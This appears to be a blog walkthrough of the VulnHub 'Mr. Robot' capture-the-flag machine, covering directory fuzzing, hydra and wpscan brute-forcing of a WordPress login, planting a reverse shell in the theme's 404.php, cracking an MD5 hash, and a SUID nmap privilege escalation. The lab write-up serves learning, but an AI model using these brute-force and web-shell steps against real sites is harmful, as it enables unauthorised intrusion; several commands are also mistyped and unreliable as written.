VulnHub’s Mr. Robot: A Walkthrough

6 min readDec 28, 2021

This is a medium-rated Linux box created by Leon Johnson. Massive thanks, as I had a great learning curve on this box, learning new things along the way

Let’s start hacking, shall we?

Reconnaisance

netdiscover the IP
IP-192.168.43.185
We get the Nmap Scan results below:-

Heading over to port 80, we get the following webpage:-

Pretty cool at first glance.

These are the commands we are permitted to run:-

Checking out the page source, we get

You have to experience playing this machine. Phew!

Let’s fuzz some websites, shall we? dirb scan gives us a lot of directories

Command — dirb http://192.168.43.185

At /0. we find a blog (Empty blog)

All the fuzzed subdirectories look uninteresting, except for the /login and /robots.txt (juicy information to get!)

We try attacking the WordPress login, using wpscan

Command- wpscan -url — enumerate u — disable-tls-checks

The wpscan did not yield names of any user

No vulnerabilities were found, in the viewpoint of exploitable plugins

We got our nikto scan results too

Exploring each / in succession:-

/favicon.ico-image,Image,image and images are non existng pages
I have wgetted the favicon.ico image
/login-leads us to the earlier wplogin.php page
At /phpmyadmin,we get

At /rdf,we get the WP version:-

At /robots,we get:-

According to the machine’s description, we found our first key

We get socity.dic as a c file, when typing it as a directory path. We download it

Checking key 1 of 3.txt, we get a key:-

Nothing of importance came from the other directories,
though /xmlrpc.php was open to receiving POST entries, we undertake a nikto scan to check for LFI vulnerability

No vulnerabilities were found.

We perform a wpscan, with a list of passwords(fsocity). That did not yield any results. It must be a decoy WP login, with no users

Enumeration

Let's try a dirb scan on the fsocity file. We get the following entries:-

Nothing out of the ordinary, but let’s check them out

We are finally getting somewhere
/images-Forbidden to enter
/image- See image below
/audio-Forbidden
/video
/blog
/login-The WP login page
/rss-RSS Summary download
/Image-Same image as below

No amount of cracking from steghide,stegseek, or exiftool tools could crack the passphrase.

We tried decoding the key, from the robots.txt, but the decoded text was gibberish

Consulting Walkthroughs

Unlike the online walkthroughs, I didn't find any message waiting for me at /readme, nor any base64 string at the bottom of the /license.txt

Testing the /wp-login page again,with dummy credentials- admin:admin.An error message pops up — “ERROR: Invalid username”

1'st indicator

Though the wpscan did not give usernames, the message indicates that there are possible users in the login.

We use the dummy credentials above in the following WPScan command, to throw us any possible usernames present in the WordPress website, along with the error message

Command-hydra 192.168.43.185 -L ./fsocity.dic -p test http-form-post “/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username” -V -I -f

Explanation of the above command:-

-p test-test is our trial and error password.Our T&E password can be anything-admin etc..
-L dictionary (fsocity.dic) . -p is not allowed,since we already moved the contents of fsocity.dic to a normal text file FSocity.
hydra does not allow two -p switches.So we use -L (dictionary)
USER-placeholder used by hydra for T&E usernames (from the ./fsocity dictionary)
PASS-hydra uses it as a placeholder for ‘test’ password,for every case of bruteforce
Eg) admin:test
root :test
F-For test fails,the message “Invalid username” should be popped up
-V-Verbose (In depth search)
-I-Ignore previous searches (test cases of bruteforcing(u:p))
-f-Stop search,when the first correct combination of username and password is found

Search Results-If you use test password “admin”, the ensuring combination from hydra will be:-

Credentials — elliot: admin

Having entered the credentials in wp, it gave an error, that “The password you entered for the username elliot is incorrect”

Let’s brute force the password then

Command-wpscan — url http://192.168.43.185/wp-login.php -U elliot -P FSociety — disable-tls-checks

FSociety-I copied the contents of fsocity.dic to a normal file called FSocity

Scan results:-

Thank you, God

We get in and try to install our reverse shell as a plugin. But was not possible.Tried importing it both .zip and .php

We go to the appearances tab and edit the 404.php file, with our reverse shell. Make sure to change IP and port

Set up netcat listener and run the following URL, to get a reverse shell
Command-http://192.168.43.185/404.php

Gaining and Maintaining access

Now, we get a $shell.We want to escape it.
So open up a vi editor file and type #!/bin/bash

This is called a restrictive shell-escape

In /home/robot, we get the following files:-

We were able to open md6.password.raw

We now decode it with any online MD5 decoder. We get:-

We then login as robot(su — robot) and read the 2-of-3.txt file

robots user is not in the sudoers file. So we couldn't sudo as root
Nothing interesting was found from find /

We have to start adopting a new technique-check for files, with suid bit set to 4000

Command- find / perm 4000 -type f 2>/dev/null or
find / -perm u=s 2>/dev/null

Privilege Escalation

Nmap in this machine, is susceptible to a privilege escalation, via the interactive mode. This affects versions of 2.02 to 5.21. The version of Nmap on this machine is vulnerable to it